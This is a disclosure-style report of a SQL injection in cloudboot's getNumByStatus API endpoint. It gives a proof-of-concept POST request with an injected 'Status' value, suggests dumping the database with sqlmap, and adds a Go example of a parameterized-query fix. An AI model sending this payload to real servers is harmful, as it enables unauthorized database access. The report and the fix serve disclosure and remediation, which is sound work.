A SQL injection was discovered in cloudboot
There is a SQL injection vulnerability which allows remote attackers to inject SQL commands via /api/osinstall/v1/device/getNumByStatus
PoC:
POST /api/osinstall/v1/device/getNumByStatus HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

{"Status":"1'order by 2#","UserID":0}
"Status" is the injection point
Use sqlmap to get the database
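
A server-side fix for the "Status" field reported above, as an added example that is not part of the original issue or of the cloudboot code base: the value is validated and then bound as a query parameter instead of being concatenated into the SQL text. The table and column names, the accepted Status format and all function names are assumptions made for illustration.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
	"regexp"
)

// statusRequest mirrors the JSON body shown in the PoC.
type statusRequest struct {
	Status string `json:"Status"`
	UserID uint   `json:"UserID"`
}

// Assumed format for a legitimate Status value (not taken from the project).
var statusOK = regexp.MustCompile(`^[A-Za-z0-9_-]{1,32}$`)

// unsafeQuery shows the pattern that makes "Status" injectable: the value
// becomes part of the SQL text. Table and column names are hypothetical.
func unsafeQuery(r statusRequest) string {
	return "SELECT COUNT(*) FROM device WHERE status = '" + r.Status + "'"
}

// safeQuery keeps the SQL text constant and returns the values separately,
// ready for db.QueryRow(query, args...) from database/sql.
func safeQuery(r statusRequest) (string, []interface{}) {
	return "SELECT COUNT(*) FROM device WHERE status = ? AND user_id = ?",
		[]interface{}{r.Status, r.UserID}
}

// parseStatusRequest decodes the body and rejects a Status outside the
// assumed format before any query is built.
func parseStatusRequest(body []byte) (statusRequest, error) {
	var r statusRequest
	if err := json.Unmarshal(body, &r); err != nil {
		return r, fmt.Errorf("bad JSON: %w", err)
	}
	if !statusOK.MatchString(r.Status) {
		return r, errors.New("invalid Status value")
	}
	return r, nil
}

func main() {
	// Request body copied from the report.
	_, err := parseStatusRequest([]byte(`{"Status":"1'order by 2#","UserID":0}`))
	fmt.Println("validation result:", err)
	q, args := safeQuery(statusRequest{Status: "1'order by 2#"})
	fmt.Println(q, args)
}
```

Parameter binding is the actual fix; the format check is defence in depth and gives a clean 400-style rejection point for logging.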